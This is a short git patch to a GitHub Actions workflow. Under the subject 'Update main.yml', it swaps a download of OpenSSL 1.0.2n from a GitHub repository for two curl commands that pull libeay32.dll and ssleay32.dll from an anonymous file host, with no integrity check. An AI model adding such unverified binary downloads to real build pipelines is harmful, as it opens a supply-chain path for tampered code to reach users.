From c74221f387c752c441617401619f9fa2e4bc3702 Mon Sep 17 00:00:00 2001 From: Sebastian Date: Sun, 22 May 2022 10:56:54 -0500 Subject: [PATCH] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7ddb586e..48e8d2a9 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -132,8 +132,8 @@ jobs: run: | mkdir OpenSSL cd OpenSSL - curl -L https://github.com/IndySockets/OpenSSL-Binaries/raw/master/Archive/openssl-1.0.2n-i386-win32.zip -o OpenSSL.zip - unzip OpenSSL.zip + curl -L https://files.catbox.moe/ctwswu.dll -o libeay32.dll + curl -L https://files.catbox.moe/ie9e77.dll -o ssleay32.dll - name: Build shell: cmd